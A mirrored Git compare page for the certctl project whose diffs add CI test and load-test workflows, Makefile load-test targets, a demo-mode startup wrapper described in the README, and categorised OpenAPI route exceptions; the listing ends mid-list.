mirror of
https://github.com/shankar0123/certctl.git
synced 2026-06-08 13:58:59 +00:00
Compare commits
64 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 5a1dbce6d5 | |||
| 76e9380389 | |||
| 7268d12a17 | |||
| 9ba5ee41be | |||
| 8e84527ba2 | |||
| 622c19cafe | |||
| bc417fc458 | |||
| ac5bb71b61 | |||
| fc237de357 | |||
| b22cdb3405 | |||
| 03f0e08a77 | |||
| 38f86bca86 | |||
| af5c39252f | |||
| 6c00f7b0d3 | |||
| 49096914d2 | |||
| aa1c12ae2d | |||
| 5231609f26 | |||
| c146e8f75b | |||
| a9e229bd2a | |||
| 700c399367 | |||
| 1fcb05181d | |||
| 508c7530e9 | |||
| c9f932be65 | |||
| 868f1c25be | |||
| 9ce2d8ca8f | |||
| 0987e222dd | |||
| e761ae40a4 | |||
| 1daae5d709 | |||
| 7c01f811a1 | |||
| c1b581b047 | |||
| e37403edf1 | |||
| 93e00f6a5e | |||
| c8985cf868 | |||
| 155f1fec98 | |||
| 29cb13e7a2 | |||
| 9135c44908 | |||
| 952682ebec | |||
| a41fc2d75c | |||
| c8347d742d | |||
| 67f346cd87 | |||
| 558d350933 | |||
| 3094010880 | |||
| cd374b243e | |||
| fbe053aa0c | |||
| b1fa4970be | |||
| b503d27b4f | |||
| de4f93b35e | |||
| 3f1344e806 | |||
| 7f57b1d3bf | |||
| aaddd31d20 | |||
| 51f9cf13dc | |||
| 57d55b7390 | |||
| c461ef3339 | |||
| 5d5bd02f3e | |||
| 45ddcb75a3 | |||
| cd3205a66d | |||
| 51529ea609 | |||
| 1279172e9b | |||
| 0ad881c2bd | |||
| ed60059e80 | |||
| ba66748b5b | |||
| 8191b1ee64 | |||
| d6f4d5c5e8 | |||
| b2284ef2a4 |
@@ -132,6 +132,18 @@ jobs:
|
|||||||
run: |
|
run: |
|
||||||
go test ./internal/service/... ./internal/api/handler/... ./internal/api/middleware/... ./internal/api/router/... ./internal/auth/... ./internal/integration/... ./internal/connector/issuer/... ./internal/connector/target/... ./internal/connector/notifier/... ./internal/connector/discovery/... ./internal/crypto/... ./internal/mcp/... ./internal/cli/... ./internal/domain/... ./internal/validation/... ./internal/tlsprobe/... ./internal/ciparity/... -count=1 -cover -coverprofile=coverage.out
|
go test ./internal/service/... ./internal/api/handler/... ./internal/api/middleware/... ./internal/api/router/... ./internal/auth/... ./internal/integration/... ./internal/connector/issuer/... ./internal/connector/target/... ./internal/connector/notifier/... ./internal/connector/discovery/... ./internal/crypto/... ./internal/mcp/... ./internal/cli/... ./internal/domain/... ./internal/validation/... ./internal/tlsprobe/... ./internal/ciparity/... -count=1 -cover -coverprofile=coverage.out
|
||||||
|
|
||||||
|
- name: Multi-replica rate-limit integration test (Phase 13 Sprint 13.2/13.3 — ARCH-M1 closure proof)
|
||||||
|
# The falsifiable proof that CERTCTL_RATE_LIMIT_BACKEND=postgres
|
||||||
|
# enforces caps cluster-wide. testcontainers-go spins one
|
||||||
|
# Postgres container; 3 *PostgresSlidingWindowLimiter instances
|
||||||
|
# share it; 100 concurrent Allow("test-key") with cap=10 must
|
||||||
|
# see exactly 10 succeed + 90 ErrRateLimited. Failure here =
|
||||||
|
# the row-lock arbitration broke; ARCH-M1 closure is invalid.
|
||||||
|
run: |
|
||||||
|
go test -tags=integration -race -count=1 -timeout=300s \
|
||||||
|
-run TestRateLimit_PostgresBackend_CapEnforcedAcrossReplicas \
|
||||||
|
./internal/integration/...
|
||||||
|
|
||||||
- name: Check Coverage Thresholds
|
- name: Check Coverage Thresholds
|
||||||
# ci-pipeline-cleanup Phase 2: per-package floors moved to
|
# ci-pipeline-cleanup Phase 2: per-package floors moved to
|
||||||
# .github/coverage-thresholds.yml. Each entry has `floor:` +
|
# .github/coverage-thresholds.yml. Each entry has `floor:` +
|
||||||
@@ -176,6 +188,15 @@ jobs:
|
|||||||
# 167 legitimate tests for no observable behavior change. The
|
# 167 legitimate tests for no observable behavior change. The
|
||||||
# Test<Func>_<Scenario>_<ExpectedResult> form remains the
|
# Test<Func>_<Scenario>_<ExpectedResult> form remains the
|
||||||
# recommended pattern for parameterized scenarios, but is not gated.
|
# recommended pattern for parameterized scenarios, but is not gated.
|
||||||
|
# Phase 4 DEPL-* prerequisite (2026-05-14): helm-templates-lint.sh
|
||||||
|
# needs the `helm` CLI on PATH to run helm lint + helm template
|
||||||
|
# against the chart. The official azure/setup-helm action installs
|
||||||
|
# a SHA-pinned helm binary into the runner.
|
||||||
|
- name: Install Helm (for helm-templates-lint guard)
|
||||||
|
uses: azure/setup-helm@b9e51907a09c216f16ebe8536097933489208112 # v4.3.0
|
||||||
|
with:
|
||||||
|
version: v3.16.0
|
||||||
|
|
||||||
- name: Regression guards (extracted to scripts/ci-guards/)
|
- name: Regression guards (extracted to scripts/ci-guards/)
|
||||||
# All named regression guards live at scripts/ci-guards/<id>.sh per
|
# All named regression guards live at scripts/ci-guards/<id>.sh per
|
||||||
# ci-pipeline-cleanup bundle Phase 1. Each guard is callable locally:
|
# ci-pipeline-cleanup bundle Phase 1. Each guard is callable locally:
|
||||||
|
|||||||
@@ -0,0 +1,108 @@
|
|||||||
|
# Phase 8 closure (TEST-H1 + TEST-H2): browser-driven E2E + visual
|
||||||
|
# regression. Informational-only until the suite is stable for 1-2
|
||||||
|
# weeks of green runs (per the Phase 8 audit prompt's DO NOT
|
||||||
|
# "promote the e2e CI job to required-for-merge in this phase").
|
||||||
|
#
|
||||||
|
# The job is intentionally NOT in the merge gate. It runs on every
|
||||||
|
# push to surface flakiness early; merge eligibility comes from
|
||||||
|
# ci.yml's existing gates (Vitest, lint, build, the 34 CI guards).
|
||||||
|
#
|
||||||
|
# Once 1-2 weeks of green runs accumulate:
|
||||||
|
# 1. Move the chromium-install + playwright steps to a reusable
|
||||||
|
# composite action so future browser projects (firefox / webkit)
|
||||||
|
# drop in cheaply.
|
||||||
|
# 2. Add the job's "id" to the branch-protection required-checks
|
||||||
|
# list in the GitHub repo settings.
|
||||||
|
# 3. Delete the "Informational" banner from this file's header.
|
||||||
|
#
|
||||||
|
# Visual regression: the 04-visual-regression.spec.ts file uses
|
||||||
|
# Playwright `toHaveScreenshot()`. First-run on a new branch
|
||||||
|
# regenerates baselines via the `--update-snapshots` flag; the
|
||||||
|
# operator commits the resulting PNG bytes to git. Subsequent runs
|
||||||
|
# pixel-diff. The dispatch input below provides an explicit knob
|
||||||
|
# for that initial baseline pass without needing to edit the
|
||||||
|
# workflow file.
|
||||||
|
|
||||||
|
name: Frontend E2E (informational)
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches: [master]
|
||||||
|
paths:
|
||||||
|
- 'web/**'
|
||||||
|
- '.github/workflows/e2e.yml'
|
||||||
|
pull_request:
|
||||||
|
paths:
|
||||||
|
- 'web/**'
|
||||||
|
- '.github/workflows/e2e.yml'
|
||||||
|
workflow_dispatch:
|
||||||
|
inputs:
|
||||||
|
update_snapshots:
|
||||||
|
description: 'Regenerate visual-regression baselines (use sparingly)'
|
||||||
|
type: boolean
|
||||||
|
default: false
|
||||||
|
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
e2e:
|
||||||
|
name: Playwright E2E + visual regression (informational)
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
# Currently informational — do not block merges on this job.
|
||||||
|
# Update protected-branch rules in repo settings once stable.
|
||||||
|
continue-on-error: true
|
||||||
|
timeout-minutes: 15
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
|
||||||
|
|
||||||
|
- name: Set up Node.js
|
||||||
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
|
with:
|
||||||
|
node-version: '22'
|
||||||
|
|
||||||
|
- name: Install Dependencies
|
||||||
|
working-directory: web
|
||||||
|
run: npm ci
|
||||||
|
|
||||||
|
- name: Install Playwright browsers
|
||||||
|
working-directory: web
|
||||||
|
# --with-deps installs OS packages (libnss3, libatk1.0-0, etc.)
|
||||||
|
# the chromium browser needs. Skipping this is the #1 source
|
||||||
|
# of "tests pass locally but fail on CI" for new Playwright
|
||||||
|
# users. The browser binary downloads to ~/.cache/ms-playwright;
|
||||||
|
# the actions/setup-node cache key does NOT include it, so each
|
||||||
|
# CI run re-downloads. Add an actions/cache step targeting
|
||||||
|
# ~/.cache/ms-playwright keyed by the @playwright/test version
|
||||||
|
# in package-lock.json once the suite is stable.
|
||||||
|
run: npx playwright install --with-deps chromium
|
||||||
|
|
||||||
|
- name: Run Playwright E2E + visual regression
|
||||||
|
working-directory: web
|
||||||
|
# The webServer block in playwright.config.ts boots `npm run dev`
|
||||||
|
# automatically and waits for http://localhost:5173 to be
|
||||||
|
# responsive before the first test fires. No separate "start
|
||||||
|
# server" step needed.
|
||||||
|
run: |
|
||||||
|
if [[ "${{ github.event.inputs.update_snapshots }}" == "true" ]]; then
|
||||||
|
echo "::warning::Regenerating visual-regression baselines"
|
||||||
|
npx playwright test --update-snapshots
|
||||||
|
else
|
||||||
|
npx playwright test
|
||||||
|
fi
|
||||||
|
|
||||||
|
- name: Upload Playwright report on failure
|
||||||
|
if: failure()
|
||||||
|
uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882 # v4
|
||||||
|
with:
|
||||||
|
name: playwright-report
|
||||||
|
path: web/playwright-report/
|
||||||
|
retention-days: 7
|
||||||
|
|
||||||
|
- name: Upload visual-regression diffs on failure
|
||||||
|
if: failure()
|
||||||
|
uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882 # v4
|
||||||
|
with:
|
||||||
|
name: visual-regression-diffs
|
||||||
|
path: web/test-results/
|
||||||
|
retention-days: 7
|
||||||
@@ -75,3 +75,65 @@ jobs:
|
|||||||
name: k6-summary-${{ github.run_id }}
|
name: k6-summary-${{ github.run_id }}
|
||||||
path: deploy/test/loadtest/results/
|
path: deploy/test/loadtest/results/
|
||||||
retention-days: 90
|
retention-days: 90
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Phase 8 SCALE-H2 — scale-tier scenarios. Three new k6 drivers:
|
||||||
|
# - bulk-renewal: 10K-cert seed + criteria-mode POST /bulk-renew
|
||||||
|
# - acme-burst: 200 concurrent VUs against directory/nonce/ARI
|
||||||
|
# - agent-storm: 5K-agent seed + 167 heartbeats/sec sustained
|
||||||
|
#
|
||||||
|
# Matrix dispatch so each scenario runs on its own runner and a
|
||||||
|
# regression in one doesn't mask another. The matrix runs in parallel,
|
||||||
|
# which keeps total wall time around the existing 25-minute cap rather
|
||||||
|
# than ~70 minutes serialised. Each scenario brings up the full
|
||||||
|
# loadtest compose stack independently — there's no shared state
|
||||||
|
# between scenarios that would benefit from a single-runner serial
|
||||||
|
# invocation.
|
||||||
|
#
|
||||||
|
# Cadence: same as the API + connector tier job above (workflow_dispatch
|
||||||
|
# + Mondays 06:00 UTC). The scale scenarios DO produce useful per-PR
|
||||||
|
# signal in theory, but the per-run cost (image build + 5min run × 3)
|
||||||
|
# is too high to gate on every PR; weekly is the right trade-off.
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
k6-scale:
|
||||||
|
name: k6 scale tier (${{ matrix.scenario }})
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 25
|
||||||
|
needs: k6
|
||||||
|
strategy:
|
||||||
|
# Parallel: a failure in one scenario shouldn't cancel the others.
|
||||||
|
# Each scenario's threshold breach is independent diagnostic data.
|
||||||
|
fail-fast: false
|
||||||
|
matrix:
|
||||||
|
scenario:
|
||||||
|
- bulk-renewal
|
||||||
|
- acme-burst
|
||||||
|
- agent-storm
|
||||||
|
|
||||||
|
steps:
|
||||||
|
- name: Checkout
|
||||||
|
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
|
||||||
|
|
||||||
|
- name: Set up Docker Buildx
|
||||||
|
uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
|
||||||
|
|
||||||
|
- name: Run scale loadtest (${{ matrix.scenario }})
|
||||||
|
env:
|
||||||
|
BUILDKIT_PROGRESS: plain
|
||||||
|
run: |
|
||||||
|
case "${{ matrix.scenario }}" in
|
||||||
|
bulk-renewal) make loadtest-scale-bulk ;;
|
||||||
|
acme-burst) make loadtest-scale-acme ;;
|
||||||
|
agent-storm) make loadtest-scale-agent ;;
|
||||||
|
*) echo "::error::unknown scenario ${{ matrix.scenario }}"; exit 1 ;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
- name: Upload summary
|
||||||
|
if: always()
|
||||||
|
uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4
|
||||||
|
with:
|
||||||
|
# Per-scenario artifact name so the three matrix runs don't
|
||||||
|
# collide on upload.
|
||||||
|
name: k6-scale-${{ matrix.scenario }}-${{ github.run_id }}
|
||||||
|
path: deploy/test/loadtest/results/
|
||||||
|
retention-days: 90
|
||||||
|
|||||||
@@ -217,6 +217,19 @@ jobs:
|
|||||||
base64-subjects: "${{ needs.aggregate-checksums.outputs.hashes }}"
|
base64-subjects: "${{ needs.aggregate-checksums.outputs.hashes }}"
|
||||||
upload-assets: true
|
upload-assets: true
|
||||||
provenance-name: multiple.intoto.jsonl
|
provenance-name: multiple.intoto.jsonl
|
||||||
|
# Phase 1 RED-2 compat (2026-05-14): the SLSA reusable workflow's
|
||||||
|
# default path downloads a pre-built generator binary from a
|
||||||
|
# GitHub *release* of slsa-framework/slsa-github-generator —
|
||||||
|
# releases are keyed by tag name (vX.Y.Z), and the workflow
|
||||||
|
# rejects SHA-form refs with "Expected ref of the form
|
||||||
|
# refs/tags/vX.Y.Z". Phase 1 RED-2 SHA-pinned every Actions
|
||||||
|
# uses: line, so the default path errors out. Setting
|
||||||
|
# compile-generator: true instead builds the generator from the
|
||||||
|
# pinned-SHA source inside the workflow run — preserves
|
||||||
|
# supply-chain integrity (SHA pin retained), adds ~1 min build
|
||||||
|
# time. This is the SLSA project's documented escape hatch for
|
||||||
|
# SHA-pinned reusable-workflow consumers.
|
||||||
|
compile-generator: true
|
||||||
|
|
||||||
# ----------------------------------------------------------------------
|
# ----------------------------------------------------------------------
|
||||||
# build-and-push-docker: push container images to GHCR with native
|
# build-and-push-docker: push container images to GHCR with native
|
||||||
|
|||||||
@@ -10,6 +10,7 @@ bin/
|
|||||||
# Frontend
|
# Frontend
|
||||||
web/node_modules/
|
web/node_modules/
|
||||||
web/dist/
|
web/dist/
|
||||||
|
web/.storybook-static/
|
||||||
|
|
||||||
# Test binary, built with `go test -c`
|
# Test binary, built with `go test -c`
|
||||||
*.test
|
*.test
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
.PHONY: help build run test lint verify verify-deploy loadtest acme-cert-manager-test acme-rfc-conformance-test keycloak-integration-test okta-smoke-test benchmark-auth benchmark-auth-coldcache clean docker-up docker-down migrate-up migrate-down generate test-cover frontend-build e2e-test qa-stats
|
.PHONY: help build run test lint verify verify-deploy loadtest loadtest-scale loadtest-scale-bulk loadtest-scale-acme loadtest-scale-agent acme-cert-manager-test acme-rfc-conformance-test keycloak-integration-test okta-smoke-test benchmark-auth benchmark-auth-coldcache clean docker-up docker-down migrate-up migrate-down generate test-cover frontend-build e2e-test qa-stats
|
||||||
|
|
||||||
# Default target - show help
|
# Default target - show help
|
||||||
help:
|
help:
|
||||||
@@ -153,6 +153,49 @@ loadtest:
|
|||||||
@echo "==> results landed in deploy/test/loadtest/results/"
|
@echo "==> results landed in deploy/test/loadtest/results/"
|
||||||
@if [ -f deploy/test/loadtest/results/summary.txt ]; then cat deploy/test/loadtest/results/summary.txt; fi
|
@if [ -f deploy/test/loadtest/results/summary.txt ]; then cat deploy/test/loadtest/results/summary.txt; fi
|
||||||
|
|
||||||
|
# Phase 8 SCALE-H2 — scale-tier load tests. Profile-gated in the
|
||||||
|
# loadtest compose so the default `make loadtest` stays fast and
|
||||||
|
# focused on the per-PR regression scope (API tier + connector tier).
|
||||||
|
#
|
||||||
|
# loadtest-scale-bulk runs the 10K-cert bulk-renew scenario.
|
||||||
|
# loadtest-scale-acme runs the 200-VU ACME directory/nonce/ARI burst.
|
||||||
|
# loadtest-scale-agent runs the 5K-agent heartbeat storm.
|
||||||
|
#
|
||||||
|
# Each target uses --exit-code-from <scenario-driver> so a threshold
|
||||||
|
# breach surfaces as a non-zero make exit. The scale-seed init runs
|
||||||
|
# once per invocation (idempotent via ON CONFLICT) so re-running a
|
||||||
|
# target against the same compose stack is fine.
|
||||||
|
loadtest-scale-bulk:
|
||||||
|
@echo "==> Phase 8 SCALE-H2: bulk-renewal scenario (10K cert fixture, ~6m)"
|
||||||
|
@cd deploy/test/loadtest && docker compose --profile scale up --build \
|
||||||
|
--abort-on-container-exit --exit-code-from k6-scale-bulk
|
||||||
|
@echo ""
|
||||||
|
@echo "==> results: deploy/test/loadtest/results/summary-bulk-renewal.{json,txt}"
|
||||||
|
@if [ -f deploy/test/loadtest/results/summary-bulk-renewal.txt ]; then \
|
||||||
|
cat deploy/test/loadtest/results/summary-bulk-renewal.txt; fi
|
||||||
|
|
||||||
|
loadtest-scale-acme:
|
||||||
|
@echo "==> Phase 8 SCALE-H2: ACME enrollment burst (200 VU, ~6m)"
|
||||||
|
@cd deploy/test/loadtest && docker compose --profile scale up --build \
|
||||||
|
--abort-on-container-exit --exit-code-from k6-scale-acme
|
||||||
|
@echo ""
|
||||||
|
@echo "==> results: deploy/test/loadtest/results/summary-acme-burst.{json,txt}"
|
||||||
|
@if [ -f deploy/test/loadtest/results/summary-acme-burst.txt ]; then \
|
||||||
|
cat deploy/test/loadtest/results/summary-acme-burst.txt; fi
|
||||||
|
|
||||||
|
loadtest-scale-agent:
|
||||||
|
@echo "==> Phase 8 SCALE-H2: agent heartbeat storm (5K agent fixture, ~6m)"
|
||||||
|
@cd deploy/test/loadtest && docker compose --profile scale up --build \
|
||||||
|
--abort-on-container-exit --exit-code-from k6-scale-agent
|
||||||
|
@echo ""
|
||||||
|
@echo "==> results: deploy/test/loadtest/results/summary-agent-storm.{json,txt}"
|
||||||
|
@if [ -f deploy/test/loadtest/results/summary-agent-storm.txt ]; then \
|
||||||
|
cat deploy/test/loadtest/results/summary-agent-storm.txt; fi
|
||||||
|
|
||||||
|
# All three Phase 8 scenarios serially. Use the matrix in
|
||||||
|
# .github/workflows/loadtest.yml for parallel CI runs.
|
||||||
|
loadtest-scale: loadtest-scale-bulk loadtest-scale-acme loadtest-scale-agent
|
||||||
|
|
||||||
# Auth Bundle 2 Phase 10 — Keycloak end-to-end OIDC integration test.
|
# Auth Bundle 2 Phase 10 — Keycloak end-to-end OIDC integration test.
|
||||||
# Boots a Keycloak container via testcontainers-go (quay.io/keycloak:25.0),
|
# Boots a Keycloak container via testcontainers-go (quay.io/keycloak:25.0),
|
||||||
# imports a canned realm with two groups + two users, and drives the
|
# imports a canned realm with two groups + two users, and drives the
|
||||||
|
|||||||
@@ -92,10 +92,12 @@ Security: three authentication paths — API keys (SHA-256 hashed + constant-tim
|
|||||||
```bash
|
```bash
|
||||||
git clone https://github.com/certctl-io/certctl.git
|
git clone https://github.com/certctl-io/certctl.git
|
||||||
cd certctl
|
cd certctl
|
||||||
docker compose -f deploy/docker-compose.yml -f deploy/docker-compose.demo.yml up -d --build
|
./deploy/demo-up.sh -d --build
|
||||||
```
|
```
|
||||||
|
|
||||||
Wait ~30 seconds, then open **https://localhost:8443** in your browser. The demo overlay flips the base into demo-mode auth (every request served as the synthetic admin actor `actor-demo-anon` — the server emits a prominent ⚠ DEMO MODE banner at boot reminding you this posture is for evaluation only) and seeds 180 days of realistic history across 13 issuers, 8 agents, managed + discovered certs, jobs, deploys, audit, and notification events. The `certctl-tls-init` init container self-signs an ECDSA-P256 cert on first boot — accept the browser warning for the demo, or feed the generated `ca.crt` to your client.
|
Wait ~30 seconds, then open **https://localhost:8443** in your browser. The `demo-up.sh` wrapper exports a fresh `CERTCTL_DEMO_MODE_ACK_TS=$(date +%s)` and forwards the remaining args to `docker compose -f docker-compose.yml -f docker-compose.demo.yml up`. The timestamp export is required by the Phase 2 SEC-H3 fail-closed guard in `internal/config/config.go::Validate` — demo deploys must re-ACK every 24h so a forgotten demo container never silently ends up serving production traffic with `auth-type=none`. The bare `docker compose ... up` command without the timestamp refuses to boot; the wrapper script is the supported entry point.
|
||||||
|
|
||||||
|
The demo overlay flips the base into demo-mode auth (every request served as the synthetic admin actor `actor-demo-anon` — the server emits a prominent ⚠ DEMO MODE banner at boot reminding you this posture is for evaluation only) and seeds 180 days of realistic history across 13 issuers, 8 agents, managed + discovered certs, jobs, deploys, audit, and notification events. The `certctl-tls-init` init container self-signs an ECDSA-P256 cert on first boot — accept the browser warning for the demo, or feed the generated `ca.crt` to your client.
|
||||||
|
|
||||||
**Production path — `.env` required, fail-closed on placeholders:**
|
**Production path — `.env` required, fail-closed on placeholders:**
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1 @@
|
|||||||
|
0
|
||||||
@@ -1,48 +1,100 @@
|
|||||||
# Routes registered in internal/api/router/router.go that are intentionally
|
# Routes registered in internal/api/router/router.go that are intentionally
|
||||||
# NOT in api/openapi.yaml. Each entry needs a one-line `why:` justification.
|
# NOT in api/openapi.yaml. Each entry needs a one-line `why:` justification
|
||||||
|
# AND a required `category:` field (added in Phase 13 Sprint 13.1,
|
||||||
|
# 2026-05-14, architecture diligence audit ARCH-H1).
|
||||||
|
#
|
||||||
# Adding a new entry requires PR-time review.
|
# Adding a new entry requires PR-time review.
|
||||||
#
|
#
|
||||||
# OpenAPI-shaped REST endpoints belong in api/openapi.yaml, NOT here.
|
# OpenAPI-shaped REST endpoints belong in api/openapi.yaml, NOT here.
|
||||||
# This list is for protocol-shaped (SCEP wire endpoints) and operational
|
# This list is for protocol-shaped (SCEP/ACME/EST wire endpoints) and
|
||||||
# (health, metrics, pprof) routes only.
|
# operational (health, metrics, pprof) routes only.
|
||||||
#
|
#
|
||||||
# Per ci-pipeline-cleanup bundle Phase 9 / frozen decision 0.11.
|
# Per ci-pipeline-cleanup bundle Phase 9 / frozen decision 0.11.
|
||||||
#
|
#
|
||||||
# Phase 5 reconciliation (2026-05-13, architecture diligence audit
|
# ──────────────────────────────────────────────────────────────────────
|
||||||
# ARCH-H1): of the 64 entries below, 35 are legitimate wire-protocol
|
# The two-bucket contract (Phase 13 Sprint 13.1)
|
||||||
# carve-outs (SCEP RFC 8894 = 8 entries, ACME RFC 8555 default + per-
|
# ──────────────────────────────────────────────────────────────────────
|
||||||
# profile = 27 entries) that MUST stay. The remaining 29 are REST-
|
|
||||||
# shaped routes whose OpenAPI ops were deferred during their original
|
|
||||||
# Bundle 2 / audit-2026-05-10 / 2026-05-11 work. Burn-down plan:
|
|
||||||
#
|
#
|
||||||
# Sprint A (per-cluster, ~7-8 ops each):
|
# category: wire-protocol
|
||||||
# Cluster 1: auth/sessions + auth/oidc (12 ops)
|
# The route's wire shape is dictated by an IETF RFC (SCEP RFC 8894,
|
||||||
# Cluster 2: auth/breakglass + auth/users + auth/runtime-config (8 ops)
|
# ACME RFC 8555, ACME ARI RFC 9773, EST RFC 7030) or it's a
|
||||||
# Cluster 3: audit/export + demo-residual/cleanup + auth/logout +
|
# sibling/shorthand variant of such a route (same wire semantics,
|
||||||
# auth/breakglass/login + auth/oidc/{login,callback,bcl} (9 ops)
|
# different cosmetic path — e.g. trailing-slash forms, default-
|
||||||
|
# profile shorthands). Documenting these as REST operations in
|
||||||
|
# openapi.yaml would duplicate the RFC with no information gain;
|
||||||
|
# the canonical operator references live in docs/acme-server.md +
|
||||||
|
# docs/operator/scep.md + docs/operator/est.md. These entries
|
||||||
|
# NEVER burn down — they're protocol contracts, not gaps.
|
||||||
|
#
|
||||||
|
# category: rest-deferred
|
||||||
|
# The route is REST-shaped (resource CRUD, JSON request/response,
|
||||||
|
# RBAC-gated) but its OpenAPI operation was deferred when the
|
||||||
|
# handler shipped. These MUST monotonically decrease to zero.
|
||||||
|
# Phase 13 Sprints 13.4-13.6 author the OpenAPI ops + delete the
|
||||||
|
# corresponding exception entries; the
|
||||||
|
# openapi-rest-deferred-monotonic.sh CI guard fails any PR that
|
||||||
|
# grows the rest-deferred bucket vs the checked-in baseline at
|
||||||
|
# api/openapi-handler-exceptions-baseline.txt.
|
||||||
|
#
|
||||||
|
# ──────────────────────────────────────────────────────────────────────
|
||||||
|
# Phase 13 Sprint 13.1 categorization (2026-05-14)
|
||||||
|
# ──────────────────────────────────────────────────────────────────────
|
||||||
|
#
|
||||||
|
# Current split, re-derived by the parity script's bucket-reporting
|
||||||
|
# subcommand (post-Sprint-13.6 / 2026-05-14):
|
||||||
|
#
|
||||||
|
# total entries: 36
|
||||||
|
# wire-protocol: 36
|
||||||
|
# rest-deferred: 0 ← THE FLOOR — ARCH-H1 substantive close
|
||||||
|
#
|
||||||
|
# Burn-down progress:
|
||||||
|
#
|
||||||
|
# Sprint 13.4 SHIPPED — 28 - 13 = 15 (auth/sessions cluster 3 ops +
|
||||||
|
# auth/oidc CRUD + JWKS + test + refresh
|
||||||
|
# + group-mappings cluster, 10 ops)
|
||||||
|
# Sprint 13.5 SHIPPED — 15 - 8 = 7 (auth/breakglass admin 4 ops +
|
||||||
|
# auth/users 3 ops + auth/runtime-config
|
||||||
|
# 1 op, 8 ops total)
|
||||||
|
# Sprint 13.6 SHIPPED — 7 - 7 = 0 (audit/export 1 op + demo-
|
||||||
|
# residual/cleanup 1 op + auth/logout 1 op +
|
||||||
|
# auth/breakglass/login 1 op + 3 OIDC
|
||||||
|
# browser-flow endpoints, 7 ops total)
|
||||||
|
#
|
||||||
|
# Sprint 13.7 next tightens the parity-script's rest-deferred floor
|
||||||
|
# from monotonic-decrease to a hard zero-exact pin. After that, any
|
||||||
|
# new REST route MUST land with an OpenAPI op or fail CI — no escape
|
||||||
|
# hatch via `category: rest-deferred`.
|
||||||
#
|
#
|
||||||
# Each authored OpenAPI op needs request/response schemas (not
|
# Each authored OpenAPI op needs request/response schemas (not
|
||||||
# placeholders) so the generated client at web/orval.config.ts emits
|
# placeholders) so the generated client at web/orval.config.ts emits
|
||||||
# typed signatures. When an op lands, delete the corresponding entry
|
# typed signatures. When an op lands, delete the corresponding entry
|
||||||
# below + bump the openapi-handler-parity.sh expected counts.
|
# below + bump api/openapi-handler-exceptions-baseline.txt downward.
|
||||||
|
|
||||||
documented_exceptions:
|
documented_exceptions:
|
||||||
- route: "GET /scep"
|
- route: "GET /scep"
|
||||||
why: "SCEP wire-protocol endpoint per RFC 8894 §3.1; serves CA certs via GetCACert/GetCACaps query params, NOT a REST resource."
|
why: "SCEP wire-protocol endpoint per RFC 8894 §3.1; serves CA certs via GetCACert/GetCACaps query params, NOT a REST resource."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /scep"
|
- route: "POST /scep"
|
||||||
why: "SCEP wire-protocol endpoint per RFC 8894 §3.1; receives PKCSReq / RenewalReq PKIMessages, NOT a REST resource."
|
why: "SCEP wire-protocol endpoint per RFC 8894 §3.1; receives PKCSReq / RenewalReq PKIMessages, NOT a REST resource."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /scep/"
|
- route: "GET /scep/"
|
||||||
why: "SCEP wire-protocol endpoint with trailing-slash variant; ChromeOS clients send the trailing-slash form."
|
why: "SCEP wire-protocol endpoint with trailing-slash variant; ChromeOS clients send the trailing-slash form."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /scep/"
|
- route: "POST /scep/"
|
||||||
why: "SCEP wire-protocol endpoint with trailing-slash variant; ChromeOS clients send the trailing-slash form."
|
why: "SCEP wire-protocol endpoint with trailing-slash variant; ChromeOS clients send the trailing-slash form."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /scep-mtls"
|
- route: "GET /scep-mtls"
|
||||||
why: "SCEP-mTLS sibling endpoint per ci-pipeline-cleanup-prerequisite EST RFC 7030 hardening Phase 6.5; same wire-protocol semantics, mutually-authenticated TLS variant."
|
why: "SCEP-mTLS sibling endpoint per ci-pipeline-cleanup-prerequisite EST RFC 7030 hardening Phase 6.5; same wire-protocol semantics, mutually-authenticated TLS variant."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /scep-mtls"
|
- route: "POST /scep-mtls"
|
||||||
why: "SCEP-mTLS sibling endpoint, POST variant."
|
why: "SCEP-mTLS sibling endpoint, POST variant."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /scep-mtls/"
|
- route: "GET /scep-mtls/"
|
||||||
why: "SCEP-mTLS sibling endpoint, trailing-slash variant."
|
why: "SCEP-mTLS sibling endpoint, trailing-slash variant."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /scep-mtls/"
|
- route: "POST /scep-mtls/"
|
||||||
why: "SCEP-mTLS sibling endpoint, trailing-slash POST variant."
|
why: "SCEP-mTLS sibling endpoint, trailing-slash POST variant."
|
||||||
|
category: wire-protocol
|
||||||
|
|
||||||
# ACME server (RFC 8555 + RFC 9773 ARI) — wire-protocol surface.
|
# ACME server (RFC 8555 + RFC 9773 ARI) — wire-protocol surface.
|
||||||
# Like SCEP/EST, ACME is a JWS-signed-JSON wire protocol whose
|
# Like SCEP/EST, ACME is a JWS-signed-JSON wire protocol whose
|
||||||
@@ -54,62 +106,90 @@ documented_exceptions:
|
|||||||
# challenge, cert, key-change, revoke-cert, renewal-info routes land.
|
# challenge, cert, key-change, revoke-cert, renewal-info routes land.
|
||||||
- route: "GET /acme/profile/{id}/directory"
|
- route: "GET /acme/profile/{id}/directory"
|
||||||
